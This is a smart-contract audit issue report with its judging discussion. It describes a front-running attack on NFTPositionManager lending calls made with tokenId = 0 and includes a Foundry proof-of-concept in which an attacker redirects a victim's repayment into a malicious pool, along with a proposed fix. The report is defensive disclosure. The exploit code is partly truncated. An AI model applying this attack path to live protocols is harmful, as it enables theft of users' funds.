sherlock-audit / 2024-06-new-scope-judging

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iamnmt - `NFTPositionManager`'s lending functions with `params.tokenId = 0` are vulnerable to front-running #59

Open sherlock-admin3 opened 3 weeks ago

sherlock-admin3 commented 3 weeks ago



NFTPositionManager's lending functions with params.tokenId = 0 are vulnerable to front-running


NFTPositionManager's lending functions do not take a lending pool as an input parameter will cause the users to interact with a malicious pool when setting params.tokenId = 0 as an attacker will front-run minting a NFT that linked to a malicious pool and then transfer it to the victim.

Root Cause

NFTPositionManager's lending functions do not take a lending pool as an input parameter.

Although the protocol mitigated the front-run attack vector by implementing an ownership check in every lending function. We believe these mitigation are not enough for the users to use the lending functions with params.tokenId = 0 safely

    if (params.tokenId == 0) {
>>    if (msg.sender != _ownerOf(_nextId - 1)) revert NFTErrorsLib.NotTokenIdOwner();
      params.tokenId = _nextId - 1;

Internal pre-conditions

A user uses a NFTPositionManager lending function with params.tokenId = 0.

External pre-conditions

No response

Attack Path

The attack vector is viable for every NFTPositionManager's lending functions (suppy, withdraw, borrow, repay), here we will demonstrate an attack path for the repay function.

  1. Alice mints a NFT with id = 1, she supplies collateral and borrows 1e18 tokenA.
  2. Alice observes that the last NFT in NFTPositionManager is her NFT (the NFT with id = 1), so she calls repay with params.tokenId = 0.
  3. The attacker front-run Alice's repay transaction with:
    • Creating a malicious pool that has tokenA and a worthless token attackerToken.
    • Supplying 1e18 tokenA directly to the malicious pool.
    • Minting a NFT with id = 2, which linked to the malicious pool.
    • Using the NFT with id = 2 to supply attackerToken as collateral, and then borrow 1e18 tokenA.
    • Tranfering the NFT with id = 2 to Alice.
  4. Alice's repay transaction is executed. She repaid to the NFT with id = 2 not the NFT with id = 1.
  5. The attacker withdraws 1e18 tokenA from the malicious pool and benefits 1e18 tokenA from Alice.


The attacker forced the user to interact with a malicious pool. In case of the repay function, the attacker stole all the funds that should be paid to the loan from the user.


Run command: forge test --match-path test/PoC/PoC.t.sol

// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import {DataTypes} from 'contracts/core/pool/configuration/DataTypes.sol';
import {IPool} from 'contracts/interfaces/pool/IPool.sol';
import {INFTPositionManager} from 'contracts/interfaces/INFTPositionManager.sol';

import {IERC20} from '@openzeppelin/contracts/token/ERC20/IERC20.sol';
import {ERC20} from '@openzeppelin/contracts/token/ERC20/ERC20.sol';

import {Test, console} from '../../lib/forge-std/src/Test.sol';
import {DeployNFTPositionManager} from 'test/forge/core/positions/DeployNFTPositionManager.t.sol';

contract AttackerToken is ERC20 {
    constructor() ERC20('XYZ', 'XYZ') {
        _mint(msg.sender, 100 ether);

contract PoC is DeployNFTPositionManager {
    address alice = makeAddr('alice');
    address attacker = makeAddr('attacker');

    IPool attackerPool;
    IERC20 attackerToken;

    function setUp() public {

        // The attacker created a malicious pool `attackerPool`

    function _setupAttackerPool() internal {
        address[] memory assets = new address[](2);
        assets[0] = address(tokenA);
        // The attacker created a malicious token `attackerToken`
        attackerToken = new AttackerToken();
        assets[1] = address(attackerToken);

        address[] memory rateStrategyAddresses = new address[](2);
        rateStrategyAddresses[0] = address(irStrategy);
        rateStrategyAddresses[1] = address(irStrategy);

        address[] memory sources = new address[](2);
        sources[0] = address(oracleA);
        sources[1] = address(oracleA);

        DataTypes.InitReserveConfig memory config = _basicConfig();

        DataTypes.InitReserveConfig[] memory configurationLocal = new DataTypes.InitReserveConfig[](2);
        configurationLocal[0] = config;
        configurationLocal[1] = config;

        address[] memory admins = new address[](1);
        admins[0] = attacker;

        DataTypes.InitPoolParams memory p = DataTypes.InitPoolParams({
            proxyAdmin: address(this),
            revokeProxy: false,
            admins: admins,
            emergencyAdmins: new address[](0),
            riskAdmins: new address[](0),
            hook: address(0),
            assets: assets,
            rateStrategyAddresses: rateStrategyAddresses,
            sources: sources,
            configurations: configurationLocal

        attackerPool = IPool(address(poolFactory.pools(1)));

    function testPoC() public {
        DataTypes.ExtraData memory dummyData = DataTypes.ExtraData(bytes(''), bytes(''));

        _mintAndApprove(attacker, tokenA, 1 ether, address(attackerPool));
        console.log("Attacker tokenA balance before: %e", tokenA.balanceOf(attacker));

        _mintAndApprove(alice, tokenA, 1 ether, address(nftPositionManager));

        // Alice created a NFT with id = 1 to interact with `pool` (this pool is unmalicious)

            // Alice borrowed 1e18 tokenA using the NFT with id = 1
            // For the sake of simplicity, the borrowing code is not implemented

        // The attacker front-ran Alice's repay transaction
            attackerPool.supplySimple(address(tokenA), attacker, 1 ether, 0);

            // The attacker created a NFT position with id = 2

            // The attacker supplied `attackerToken` to back the borrowing
            attackerToken.approve(address(nftPositionManager), type(uint256).max);
            INFTPositionManager.AssetOperationParams memory paramsSupply =
            INFTPositionManager.AssetOperationParams(address(attackerToken), address(0), 100 ether, 0, dummyData);

            // The attacker borrow tokenA from `attackerPool`
            INFTPositionManager.AssetOperationParams memory paramsBorrow =
            INFTPositionManager.AssetOperationParams(address(tokenA), attacker, 1 ether, 0, dummyData);

            // The attacker tranfer the NFT with id = 2 to Alice
            nftPositionManager.transferFrom(attacker, alice, 2);

        // Alice observed the last NFT is her NFT with id = 1
        // so she repaid to the NFT with id = 0
        // Because of the attack, the last NFT is now the NFT with id = 2
            INFTPositionManager.AssetOperationParams memory paramsRepay =
            INFTPositionManager.AssetOperationParams(address(tokenA), address(0), 1 ether, 0, dummyData);


        attackerPool.withdrawSimple(address(tokenA), attacker, 1 ether, 0);
        console.log("Attacker tokenA balance after: %e", tokenA.balanceOf(attacker));


  Attacker tokenA balance before: 1e18
  Attacker tokenA balance after: 2e18


Add a lending pool to the input parameters of NFTPositionManager's lending functions, add check against this lending pool when params.tokenId == 0

    if (params.tokenId == 0) {
      params.tokenId = _nextId - 1;
      if (msg.sender != _ownerOf(params.tokenId) || _positions[params.tokenId].pool != params.pool) revert NFTErrorsLib.NotTokenIdOwner();
sherlock-admin3 commented 1 week ago

1 comment(s) were left on this issue during the judging contest.

Honour commented:

Invalid: see comment on #024

nevillehuang commented 1 day ago

I believe this is valid because pool creation is permisionless

Honour-d-dev commented 10 hours ago


Invalid issue, calling supply withdraw borrow repay with tokenId == 0 fall under the category of user mistakes It is very clear that this functionality was intended to be used in atomic transactions via the multi-call, so a user can mint and deposit , supply, borrow e.t.c. in one transaction .

It's not sensible for a user with an nft to call either functions with tokenId == 0 as it cannot be guaranteed that their nft was the last minted

sherlock-admin3 commented 10 hours ago


Invalid issue, calling supply withdraw borrow repay with tokenId == 0 fall under the category of user mistakes It is very clear that this functionality was intended to be used in atomic transactions via the multi-call, so a user can mint and deposit , supply, borrow e.t.c. in one transaction .

It's not sensible for a user with an nft to call either functions with tokenId == 0 as it cannot be guaranteed that their nft was the last minted

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